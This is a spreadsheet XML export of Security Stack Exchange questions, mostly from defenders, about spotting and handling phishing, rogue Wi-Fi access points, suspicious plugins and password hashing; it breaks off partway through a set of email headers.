 &lt;p&gt;Thanks a lot for any insights!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;google&gt;&lt;phishing&gt;&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>endpoint made connection to an IP adress the hostname is not resolving to</t>
  </si>
  <si>
    <t>&lt;p&gt;Our security product alerted on a possible malicious communication detected by analyzing DNS transactions. The DNS name in question is &lt;code&gt;www.cyber-sale.net&lt;/code&gt;. I could correlate this even to another event when looking at EDR logs. What surprised me after looking further is the fact the from the EDR logs it looks that this domain got resolved to &lt;code&gt;52.7.88.0&lt;/code&gt; (note, I'm not surprised that the last octet ends with an 0). When I perform a ping or nslookup on &lt;code&gt;www.cyber-sale.net&lt;/code&gt; I'm getting two IP's returned that from what I can tell point to AWS Elastic Load Balancing instances:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;www.cyber-sale.net canonical name = prod-lp-alb-1655798893.us-east-1.elb.amazonaws.com.
 Name: prod-lp-alb-1655798893.us-east-1.elb.amazonaws.com
 Address: 52.4.230.186
 Name: prod-lp-alb-1655798893.us-east-1.elb.amazonaws.com
 Address: 34.204.254.77
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;If I perform &lt;a href="https://urlscan.io/search/#52.7.88.0" rel="nofollow noreferrer"&gt;URLscan&lt;/a&gt; on &lt;code&gt;52.7.88.0&lt;/code&gt; I can't find the &lt;code&gt;www.cyber-sale.net&lt;/code&gt; domain.&lt;/p&gt;
 &lt;p&gt;If I perform &lt;code&gt;nslookup 52.7.88.0&lt;/code&gt; it returns:&lt;/p&gt;
 &lt;p&gt;&lt;code&gt;0.88.7.52.in-addr.arpa name = ec2-52-7-88-0.compute-1.amazonaws.com.&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;If I check on the previous urlscan and search for &lt;code&gt;ec2-52-7-88-0.compute-1.amazonaws.com&lt;/code&gt; I'm getting hits, and that seams to by one of the servers used by Proofpoint for phishing campaign simulations.&lt;/p&gt;
 &lt;p&gt;Querying the domain in &lt;a href="https://otx.alienvault.com/indicator/hostname/www.cyber-sale.net" rel="nofollow noreferrer"&gt;OTX AlienVault&lt;/a&gt; returns 133 passive DNS entries, but never at a point it time did the domain point to &lt;code&gt;52.7.88.0&lt;/code&gt;, although I'm aware that this data is most likely not complete.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/15bgU.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/15bgU.png" alt="otx alienvault" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;None, of the threat intelligence platforms returned any warnings for this. Anyone has an idea how did the client end up connecting to &lt;code&gt;52.7.88.0&lt;/code&gt; directly? Did it bypass the AWS ELB's?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Why doesn't Outlook handle phishing URLs</t>
  </si>
  <si>
    <t>&lt;p&gt;There are two MAJOR problems at my company (as in several others also I presume).&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Users clicking on links in phishing emails.&lt;/li&gt;
 &lt;li&gt;Users opening (and running) malware-infected attachments.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Yes, I should block attachments and I do. Everything but PDF, excel, word and ppt which I simply can't unless we want to go out of business. Everything else is blocked on server level.&lt;/p&gt;
 &lt;p&gt;Yes, I know that the users should be educated. They are. But they still click links and open attachments. More education? Sure, but I will never reach 100%. Not even 75%. So what is the solution? We run both IDS and IPS with 24/7 monitoring via a SOC. All emails are monitored and all attachments run in a sandbox before being delivered to end users. URLs in emails are also checked (via third party solution against a cloud-based blacklist). And on top of this, all clients run a multi-layered endpoint antivirus. End users are STILL being infected since attachments contain new strains of malware or 0-days and URLs have not yet been blacklisted. I believe that certain easy solutions are overlooked in general regarding phishing. Do you agree? (See below.)&lt;/p&gt;
 &lt;p&gt;We use Outlook as an email client and the questions I ask myself every single day is why Outlook doesn't have better phishing protection. For example:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;Why doesn't Outlook check if the link text contains a URL that is different from the &lt;code&gt;&amp;lt;a href-URL&amp;gt;&lt;/code&gt;. Why should the user have to hoover every URL and make their own decision?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Why doesn't Outlook check if the FROM field differs from the envelope email header? The oldest trick in the phishing handbook. Why should I let the users try to notice this themselves?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Why can't I ask Outlook to scan all emails for certain "dangerous phishing words" like e.g. FedEx, Visa, Mastercard, password, bank account, reset password, confirm account etc etc. Yes, I know about DLP but now I am talking about a client-side solution for incoming emails.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Why on earth is it not possible to turn off ALL links in ALL emails in Outlook? As far as I know it is only possible for plain text emails. This will not make it 100% secure, but at least it will prevent people from clicking links without thinking (i.e. copy-pasting).&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Why can't Outlook notify a user that the email they just received is from an unknown sender (i.e. not in their address book) and has an attachment? All in all, this is often highly suspicious.&lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;The above is just very simple things that could be implemented within the email program on the client side and make life easier for end users and for sysadmins.&lt;/p&gt;
 &lt;p&gt;What is it that I am missing in this line of reasoning? It must be something since this is not implemented in any email software. Or is it? Any thoughts about this are greatly appreciated.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;email-spoofing&gt;&lt;outlook&gt;</t>
  </si>
  <si>
    <t>Google Chrome &amp; Spear-phishing</t>
  </si>
  <si>
    <t>&lt;p&gt;I've been trying to find some information on how Google Chrome detects phishing pages that are not already in their blacklists. The most relevant information that I've found from Google itself, &lt;a href="https://support.google.com/chrome/answer/99020?hl=en"&gt;states&lt;/a&gt;:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Second, Safe Browsing helps to protect you against targeted phishing attacks (sometimes called ‚Äúspear phishing‚Äù), where a site may not already be known to Google so isn‚Äôt on the list of phishing sites. Chrome does this by analyzing the content on the site and warn you if it seems suspicious.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Does anyone have any more information on the specific type of "content analysis" that Chrome is doing?&lt;/p&gt;
 &lt;p&gt;Thanks! &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;chrome&gt;</t>
  </si>
  <si>
    <t>Installing a cocoapod and 'github' asks for login credentials?</t>
  </si>
  <si>
    <t>&lt;p&gt;I just added a cocoapod and got this &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;gt;ls
 Podfile superApp
 Podfile.lock superApp.xcodeproj
 Pods superApp.xcworkspace
 &amp;gt;pod install
 Updating local specs repositories
 Username for 'https://github.com': Password for 'https://github.com': 
 Analyzing dependencies
 Downloading dependencies
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;That github prompt is fishy (/phishy). I entered a bogus email and no password and it started downloading.&lt;/p&gt;
 &lt;p&gt;Any ideas?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ios&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Using Lynx on potentially malicious websites</t>
  </si>
  <si>
    <t>&lt;p&gt;After needing to refresh how to unpack an android ramdisk, the site I remember having good information comes up with something similar to this:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/cEBvS.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/cEBvS.png" alt="Reported Unwanted Software Page!"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Being cautious, but still wanting to get what was on the page, I turned to lynx. &lt;/p&gt;
 &lt;p&gt;Finding that &lt;code&gt;lynx -dump http://website.com &amp;gt; /where/i/want/it&lt;/code&gt; would get what I need, I am wondering: Am I still open to some sort of attack? &lt;/p&gt;
 &lt;p&gt;On this &lt;a href="https://support.mozilla.org/en-US/kb/how-does-phishing-and-malware-protection-work?as=u&amp;amp;utm_source=inproduct" rel="nofollow noreferrer"&gt;Mozilla&lt;/a&gt; page it seems pages like this are geared more towards tricking someone into clicking something then downloading malware.&lt;/p&gt;
 &lt;p&gt;Would I be safe from other common attack methods as well? Since I am just pulling off text, I am assuming lynx doesn't run many of the scripts necessary to start rogue downloads etc.. But I don't know a whole lot about these things =)&lt;/p&gt;</t>
  </si>
  <si>
    <t>Rude neighbor with PineAP or something similar</t>
  </si>
  <si>
    <t>&lt;p&gt;For the past week or so I've been having problems with wifi in my house, and it appears that my neighbor set up a Pineapple or something similar that is running a known beacon attack and/or Karma/Dogma. It is also interfering with devices connecting to my WPA2 AP.&lt;/p&gt;
 &lt;p&gt;Symptoms:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;A rotating list of 20 or 30 SSIDs show up with common names (attwifi, Google Starbucks, wifi...) and with very specific names (the SSID of the city library wifi, random default router SSIDs like SpectrumXXXX, Fios-XXXX). &lt;/li&gt;
 &lt;li&gt;Connecting to one of the SSIDs prompts for a login, which presents a fake FB, Google, or other phishing page to Android, iOS, and MacOS devices, but not Windows 10 devices&lt;/li&gt;
 &lt;li&gt;There appears to wifi interference of some kind. My WPA2 AP has a stronger signal within my house than the rogue AP, but devices take 10-30 minutes to automatically connect to my network. The devices say connected, no internet and after repeated reconnections will eventually start working, or leaving the device running will allow it to connect. This is especially annoying with the smart TV, waiting 20 minutes for it to begin to function.&lt;/li&gt;
 &lt;li&gt;The evil twin appears to be pretty simple, it presents the same MAC for all SSIDs, starting with 00:13:37, always channel 11, 2.4 Ghz only&lt;/li&gt;
 &lt;li&gt;The thing is powerful. I've used a stumbler app on my phone and it has signal for over a 250m radius and doesn't appear to be directional. Getting too close (within ~100 ft of it) causes my phone's wifi to stop responding and I get a message about wifi being jammed. 100 ft is in the middle of the street, so it's strong enough to cause errors on my phone when I'm driving near my house.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;The MAC address indicates it could be a PineAP, or maybe a device running wifiPhisher. The AP names that are echoed back seem like they could be collected by wifi harvester, or maybe from a stumbler or database.&lt;/p&gt;
 &lt;p&gt;I am primarily frustrated by the interference with my APs. Nothing appears to be wrong that I can see in my APs (Unifi) and router (Frontier, running DHCP), no extra clients or strange traffic, but they have limited data gathering capabilities. I just ordered an Alfa wifi adapter to see if I can detect aireplay or some other unusual activity indicating a DoS or deauth or some other attack on my AP.&lt;/p&gt;
 &lt;p&gt;What do I need to look for to detect an attack? I'm guessing that airodump should give me indication of an attack if it's happening, but I don't really know what to look for.&lt;/p&gt;
 &lt;p&gt;What can I do to prevent autoconnecting to SSIDs, or blocking the rogue AP? &lt;/p&gt;
 &lt;p&gt;Any other ideas for dealing with the device?&lt;/p&gt;
 &lt;p&gt;Is there an easy tool available to spam the phishing forms with data? Seems like submitting junk logins in a loop to the rogue AP will eventually fill up the storage and may interfere with its operation, with the added benefit of burying any real credentials that were input by unwary people.&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;&lt;strong&gt;Clarification&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Most of the comments suggest one of two routes, go talk to the neighbor or call the police. I understand those options, but I would like to understand intent and risk a little more before I do that.&lt;/p&gt;
 &lt;p&gt;As an analogy, if a neighbor has left their 1000 watt flood light on and it's shining into my bedroom window, it's really annoying and the neighbor is being inconsiderate. The correct response would be to go talk to the neighbor. If a neighbor is hiding in the bushes, filming video and shining lights into my house then the neighbor is a criminal and contacting law enforcement is appropriate.&lt;/p&gt;
 &lt;p&gt;I'm trying to tell if the neighbor bought a new toy and just left it plugged in, or has malicious intent. If it's the first then politely asking will fix the problem. If it's the second then politely asking will make them aware that they've been detected and could lead to more subtle methods that are harder to detect. Submitting junk to their device would be the equivalent of turning my floodlights on to shine back at their house, perhaps passive-aggressive, but also a nudge toward social conformity.&lt;/p&gt;
 &lt;p&gt;What would I need to look for to detect an active attack vs a stock pentest device just running? Would it be obvious in airodump? Or some other tool? Is there something else I should be looking for?&lt;/p&gt;
 &lt;p&gt;To answer some of the questions, I'm in a suburban city in Texas and I don't expect local law enforcement to understand unless I lead them by the nose (and only then if I'm lucky). FCC, FBI, or similar may have a little interest, but attacking some home wifi or transmitting at 1 watt over allowed is very minor.&lt;/p&gt;
 &lt;p&gt;I haven't seen the device actively impersonate my SSID, and it has definitely not presented WPA, so the interference with my connections would either be noise or something like an active deauth attack (how would I detect this?)&lt;/p&gt;
 &lt;p&gt;Also, the device does not provide a functional internet connection. After the phishing page it goes to a 401-like message and that's it, so it can't be sniffing http traffic that's not happening.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;wifi&gt;&lt;defense&gt;&lt;rogue-ap&gt;</t>
  </si>
  <si>
    <t>user251136</t>
  </si>
  <si>
    <t>Can I trust public socks4 proxy when using only HTTPS?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am using a socks4 public proxy for more speed/bandwidth. I am currently using it for downloading files. Now I want to use it for social media or daily day usage. I know that they will get all my traffic. I use DNS over HTTPS in Firefox. So, I think that they won't be able to redirect a phishing site or something like that. But, what about other things like, my password?
 I also enabled HTTPS mode in Firefox. So, can I use it safely for daily usage?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;proxy&gt;</t>
  </si>
  <si>
    <t>Linux: Chinese Unionpay plugin, Ubuntu 64-bit - Spamware / Trojan?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;strong&gt;China / Linux / Bank / Trojan / Backdoor / Executables&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Hey guys. I've got an account with a Chinese bank (I live here), and in the process of setting up an online account for the Chinese version of Amazon, I've been asked to install a plugin for the Unionpay debit card.&lt;/p&gt;
 &lt;p&gt;The question is: &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Is there any way to analyze it and determine if the plugin contains malware, or what it will be doing?&lt;/strong&gt; It's a binary executable. The ostensible purpose is to "enter your pin number during bank card verification". 
 (This is Linux, Ubuntu 15.04, 64-bit.)&lt;/p&gt;
 &lt;p&gt;115% suspicious, naturally, and it's an option I'd avoid if there's any alternative, but this is pretty much the choice here. Other than having everything express-mailed from the States. &lt;/p&gt;
 &lt;p&gt;The UnionPay network is equivalent to Mastercard or Visa in your Western-world comparison. So, it's not some tiny Chinese bank or Mr. Chen's phishing site. However, wouldn't put it past them to backdoor everyone's computers as a general policy.&lt;/p&gt;
 &lt;p&gt;Here's a link to the Arch version of the package.
 &lt;a href="https://aur.archlinux.org/packages/upeditor/" rel="nofollow"&gt;https://aur.archlinux.org/packages/upeditor/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;And the source:
 &lt;a href="https://user.95516.com/ctrl/UPEditorLinux64_2.tar.gz" rel="nofollow"&gt;https://user.95516.com/ctrl/UPEditorLinux64_2.tar.gz&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Anybody here intelligent and capable enough to dig into this a bit?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;linux&gt;&lt;ubuntu&gt;&lt;trojan&gt;</t>
  </si>
  <si>
    <t>Would making an IIS web server appear to be running Apache instead improve security?</t>
  </si>
  <si>
    <t>&lt;p&gt;As you can see from the tag, I know that &lt;a href="https://en.wikipedia.org/wiki/Security_through_obscurity" rel="nofollow"&gt;security by obscurity&lt;/a&gt; is not true security.&lt;/p&gt;
 &lt;p&gt;So consider a server available to the Internet on port 443 (SSL) of a fixed IP address in the dialup range of a telecommunications provider only. When https'ed, it shows an &lt;a href="https://en.wikipedia.org/wiki/Internet_Information_Services#History" rel="nofollow"&gt;IIS&amp;nbsp;8&lt;/a&gt; welcome page. The server can be reached via IP address only, no DNS entry (except the usual &lt;code&gt;ip-&amp;lt;ip&amp;gt;.customers.provider.com&lt;/code&gt; entry that is set for EVERY IP address in the provider's range). The IP address is stored in the mail accounts of Windows Phone, iOS and Android devices, and entered from browsers with Google, &lt;a href="http://en.wikipedia.org/wiki/Bing" rel="nofollow"&gt;Bing&lt;/a&gt;, and Yahoo auto-search, thus technically known to Google, Apple, Yahoo and Microsoft, and possibly other third-party application vendors if these can access mail account settings from their applications.&lt;/p&gt;
 &lt;p&gt;Furthermore it is used for browsing the Internet and writing email, and is stored in many server logs, etc., etc., and especially on the sites where one has to log in, like Stack&amp;nbsp;Exchange, you can see easily that it is a fixed IP address, since the IP address has always been tied to the same username for the last two years.&lt;/p&gt;
 &lt;p&gt;On that IIS server, OWA and &lt;a href="https://en.wikipedia.org/wiki/ActiveSync" rel="nofollow"&gt;ActiveSync&lt;/a&gt; are running. Both are required to access mail from everywhere. These are the applications that I would expect on an IIS server, and try first when I see an IIS welcome page.&lt;/p&gt;
 &lt;p&gt;Apart from doing Windows/Exchange updates regularly, using hard passwords, introducing all employees to the concepts of phishing and social engineering, and hoping that our email is not interesting enough to justify a fully fledged attack directed at us especially, could it make sense to "secure" the server by changing the page returned on a "naked" HTTPS request to a page indistinguishable (including all headers) from an "It works!" Apache page?&lt;/p&gt;
 &lt;p&gt;I could use some gooood arguments that a CEO, who came up with that idea in the first place, may understand.&lt;/p&gt;
 &lt;p&gt;EDIT: No, I don't need to get top management's support for security. The CEO seems to care for security already, or else he would not come up with such ideas for "improvement". I am not a security guy with certificates and all, just a concerned citizen, mainly developer, part-time server administrator. Our company does not have a real security guy; we are four people right now.&lt;/p&gt;
 &lt;p&gt;Since I do server administration part time, I was asked to change the server. But before I dig down deep for information on how to change the default headers in IIS, I would like to question the whole "project"...&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;webserver&gt;&lt;security-theater&gt;</t>
  </si>
  <si>
    <t>What is this phishing technique called using subdomains</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm writing a blog post analyzing a list of phishing domains and I'm coming across a lot of IDN homograph attack domains and these "subdomain attack domains" but I cannot find the technical/good way to describe it.&lt;/p&gt;
 &lt;p&gt;For example, this type of domain is used to phish microsoft login details&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;login.microsoft.com.account.auth.redacted.com
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;How would you describe/categorize that style of attack with the same calibre of IDN homograph attack? The best I've come up with is "subdomain attack" but I don't think it makes sense in this context.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;terminology&gt;&lt;dns-domain&gt;&lt;sub-domain&gt;</t>
  </si>
  <si>
    <t>Why do CDNs allow arbitrary backend to be set, is it not a big security concern?</t>
  </si>
  <si>
    <t>&lt;p&gt;I found most CDNs allow the user to claim &lt;em&gt;any&lt;/em&gt; domains to be the backend, I wonder why they do this instead of verifying if the user owns the backend domain. If I have &lt;code&gt;myowndomain.com&lt;/code&gt; and set the backend to be &lt;code&gt;facebook.com&lt;/code&gt;, wouldn't it be an easier way to do attacks such as phishing? Of course, I still need to solve CORS, SOP, and Cookie related issues, but why do CDNs open the backend at the first place? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;proxy&gt;&lt;caching&gt;&lt;cdn&gt;</t>
  </si>
  <si>
    <t>Why do phishing sites use images instead of just copying the HTML?</t>
  </si>
  <si>
    <t>&lt;p&gt;Why do phishing sites use pictures of the full site (e.g., they took screenshot and broke it up) instead of just copying the real HTML and modifying the target for form submission of username/password?&lt;/p&gt;
 &lt;p&gt;It would seem a lot of people would notice that the text is not selectable or that interactive features do not work.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;detection&gt;</t>
  </si>
  <si>
    <t>What should be done about the billion stolen passwords on Yahoo?</t>
  </si>
  <si>
    <t>&lt;p&gt;What can a Yahoo user do about this?&lt;/p&gt;
 &lt;p&gt;&lt;a href="http://arstechnica.com/security/2016/12/what-can-you-do-with-a-billion-yahoo-passwords-lots-of-bad-things/" rel="nofollow noreferrer"&gt;http://arstechnica.com/security/2016/12/what-can-you-do-with-a-billion-yahoo-passwords-lots-of-bad-things/&lt;/a&gt;&lt;/p&gt;
 &lt;h2&gt;What can you do with a billion Yahoo passwords? Lots of bad things&lt;/h2&gt;
 &lt;h2&gt;Now, Yahoo user data could be behind scores of spear-phishes or other breaches.&lt;/h2&gt;
 &lt;p&gt;Obviously, my passwords should get changed, and 2FA enabled but is there anything specific I should do to mitigate this problem?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;phishing&gt;&lt;yahoo&gt;</t>
  </si>
  <si>
    <t>On two-step login forms, why is it the login name and not the password that's asked first?</t>
  </si>
  <si>
    <t>&lt;p&gt;There are several login forms (e.g. Google's) on the internet where you first enter your login name and then, once that's submitted, you get to enter your password.&lt;/p&gt;
 &lt;p&gt;One of the advantages of this is, I suppose, that the server can pull up an image only it knows and display it to the user to help foil simple phishing schemes.&lt;/p&gt;
 &lt;p&gt;My question is why nobody does it the other way around - first ask for a password and then for the login name.&lt;/p&gt;
 &lt;p&gt;I can see the obvious answer (that the password might not be unique and therefore the server wouldn't know whose anti-phishing-images to display), but that doesn't convince me. Immediately disabling accounts which share passwords or at least forcing users to change their passwords to a unique string next time they log in might be ways around that and as an aside it would solve the "123456" password phenomenon.&lt;/p&gt;
 &lt;p&gt;Another issue I can see is that in a phishing scenario where a user enters his password correctly and then notices that the wrong images are displayed to him, he's already given up his password and all that remains for the phisher to do is to identify who this password belongs to.&lt;/p&gt;
 &lt;p&gt;What I'd like to know is whether the login-then-password sequence is mostly due to convention or user interface considerations or whether there are other security issues with reversing the sequence to ask for the password first (besides the two I've mentioned).&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;passwords&gt;&lt;password-management&gt;&lt;password-policy&gt;&lt;google&gt;</t>
  </si>
  <si>
    <t>How should I choose a difficulty factor for my password hashing function?</t>
  </si>
  <si>
    <t>&lt;p&gt;Assuming that I'm doing password hashing properly and using bcrypt, scrypt or PBKDF2, how should I go about choosing an appropriate difficulty factor? i.e rounds for bcrypt, iterations for PBKDF2 and maxtime, maxmem or maxmemfrac for scrypt.&lt;/p&gt;
 &lt;p&gt;Also assume that the worst-case scenario will happen and my user's hashes and salt (and any application-salt or pepper. You know... &lt;em&gt;worst-case&lt;/em&gt;.) will be leaked, either accidentally or deliberately.&lt;/p&gt;
 &lt;p&gt;I need to choose a value that is:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Easy enough for me.&lt;/li&gt;
 &lt;li&gt;Too hard for an attacker.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;The first part is relatively easy. If I choose enough rounds to cause bcrypt to take 0.5 seconds, I can be sure that my users won't see a significant slowdown when they login. (In a web app anyway, 0.5 seconds is not very a long time.) I also know by testing a loop over that function that I can handle many more logins per minute than I am currently seeing. If the rate of logins I get increases, I can lower the number of rounds and migrate users over as each one logs in or I can wait for better, cheaper hardware. When I naturally get better, cheaper hardware in my upgrade cycle I can increase the rounds to compensate.&lt;/p&gt;
 &lt;p&gt;The question that's more difficult to answer is how hard is &lt;em&gt;too hard&lt;/em&gt; for an attacker. Of course it depends on the value of the passwords to a particular attacker but for this question, assume no special value beyond the fact that most of these user/password combinations will work on other sites that actually have value.&lt;/p&gt;
 &lt;p&gt;If I change the number of bcrypt rounds so that it now takes 0.01 seconds instead of 0.5, has this changed the equation for the attacker so that the brute-forced password is now worth more than the cost to brute-force it? How can I know whether it has or not?&lt;/p&gt;
 &lt;p&gt;It seems this is fairly easy to calculate based on knowing the following:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;How much a generic username/password pair is worth.&lt;/li&gt;
 &lt;li&gt;How much it costs to brute-force a hash of $hash_function with $difficulty_factor.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Since scrypt was designed to be memory-hard rather than CPU-hard, the answer to 2. will vary differently depending on algorithm. It's not a linear speedup as CPU/GPU speeds increase or RAM prices decrease.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Is there a place where can I find out the above information that is updated as new hardware becomes available?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;The best resource I have found so far for the value of a password is blog posts by Brian Krebs such as &lt;a href="http://krebsonsecurity.com/2011/10/how-much-is-that-phished-paypal-account/" rel="nofollow noreferrer"&gt;this one&lt;/a&gt; and &lt;a href="http://krebsonsecurity.com/2010/05/phished-brands-seize-on-teachable-moments/" rel="nofollow noreferrer"&gt;this one&lt;/a&gt;. For hashes cracked per second, it's the &lt;a href="http://contest-2011.korelogic.com/stats.html" rel="nofollow noreferrer"&gt;"Crack me if you can" contest at DEFCON&lt;/a&gt;. Hashes cracked per dollar would be nice.&lt;/p&gt;
 &lt;p&gt;Please ignore in your answers any algorithmic flaws in these algorithms. If one of those is found I would simply switch to one of the other alternative algorithms. I assume that if a flaw is found in any of these it will be all over the security news.&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;Just found &lt;a href="https://crypto.stackexchange.com/a/2960"&gt;over on Crypto.SE&lt;/a&gt; this table from the &lt;a href="http://www.tarsnap.com/scrypt/scrypt.pdf" rel="nofollow noreferrer"&gt;paper defining scrypt&lt;/a&gt;:&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/6Iwa2.png" alt="Table of estimated cost of hardware to crack a password in one year."&gt;&lt;/p&gt;
 &lt;p&gt;All I need is for that table to be updated every year.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;hash&gt;&lt;bcrypt&gt;&lt;scrypt&gt;&lt;pbkdf2&gt;</t>
  </si>
  <si>
    <t>Can we infect our system by opening a email with outlook 2016?</t>
  </si>
  <si>
    <t>&lt;p&gt;I read that it is possible to get a virus just by opening a mail (not even clicking at any links on it or opening the attachments), because scripts can be attached to it.&lt;/p&gt;
 &lt;p&gt;Is this also true for Outlook 2016? Is scripting activated by default?&lt;/p&gt;
 &lt;p&gt;I am using Version 1811&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;outlook&gt;</t>
  </si>
  <si>
    <t>Email password asked when trying to convert pdf to word, is this a phishing site?</t>
  </si>
  <si>
    <t>&lt;p&gt;This morning, while trying to convert a .pdf file to Word at &lt;a href="https://www.pdftoword.com/en/" rel="nofollow noreferrer"&gt;Nitro&lt;/a&gt;, I was asked for my email address first to send the converted file. This is very natural. But as soon as I hit the &lt;strong&gt;&lt;code&gt;Convert Now&lt;/code&gt;&lt;/strong&gt; button, another box appeared asking for a password.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/TfvrQ.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/TfvrQ.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I found this to be extremely suspicious and aborted the job then and there.&lt;/p&gt;
 &lt;p&gt;Is this a phishing site or am I missing something here? &lt;/p&gt;
 &lt;p&gt;I did not find any feature for membership registration at the site so I don't think that this is a membership password.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Why are my emails going to spam?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have been trying to learn about phishing emails. I have read up quite a bit on it. I setup a domain somthing.tk (free domain), hosted a website on a VPS (Digital Ocean). Set up my own mail transfer agent (Postfix).&lt;/p&gt;
 &lt;p&gt;Now I have set up:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;DKIM&lt;/li&gt;
 &lt;li&gt;DMARC&lt;/li&gt;
 &lt;li&gt;SPF&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;All pass in GMail when I send the mail, but still the mails send by me are flagged as spam by GMail spam filter. What am I doing wrong?&lt;/p&gt;
 &lt;p&gt;Also I am using GNUMail to send emails via this command:&lt;/p&gt;
 &lt;p&gt;&lt;code&gt;echo "anything" | mail -s "subject" anything@gmail.com&lt;/code&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;gmail&gt;&lt;email-spoofing&gt;&lt;postfix&gt;</t>
  </si>
  <si>
    <t>What are common/official methods of reporting spam/phishing/nasty-grams to organizations?</t>
  </si>
  <si>
    <t>&lt;p&gt;A user of mine just received a phishing email claiming to be the IRS. What methods of reporting are available, and what should be included?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;disclosure&gt;&lt;spam&gt;</t>
  </si>
  <si>
    <t>Is this Amazon Business email phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;Today, I recieved a message that purports to be from Amazon.
 &lt;a href="https://i.stack.imgur.com/PGqC9.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/PGqC9.png" alt="Screenshot"&gt;&lt;/a&gt;
 Normally, I can spot a phishing email from a distance. (I work in an ISP's Abuse &amp;amp; NOC department.) But this one seems just slightly off. If it is phishing, it's scary good.&lt;/p&gt;
 &lt;p&gt;The one hint I have that it's not real is that it was sent to an address of {the A in Q&amp;amp;A}@eoni.com, which doesn't have a Kenneth (it's a tech support address for our ISP that also does domain hosting). The fact that they are using that address makes me think the address could have been automatically collected (whois probably). It is quite possible that one of the domains we host is for a customer named Kenneth, and that that domain has our contact address on the whois record somewhere. We have enough domains hosted that just a first name is not going to be enough to find said domain name and look at the whois record.&lt;/p&gt;
 &lt;p&gt;Being in the abuse department, I wanted to know if this is real or not (so I can report it if not/possibly block it from working on our network if it is a Phish).&lt;/p&gt;
 &lt;p&gt;Here's the headers:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Return-Path: &amp;lt;01010157e278aa63-283a615a-b603-4300-8c6f-8426b3978f81-000000@us-west-2.amazonses.com&amp;gt;
 Delivered-To: {a in Q&amp;amp;A}@eoni.com
 Received: (qmail 8542 invoked from network); 20 Oct 2016 14:22:22 -0000
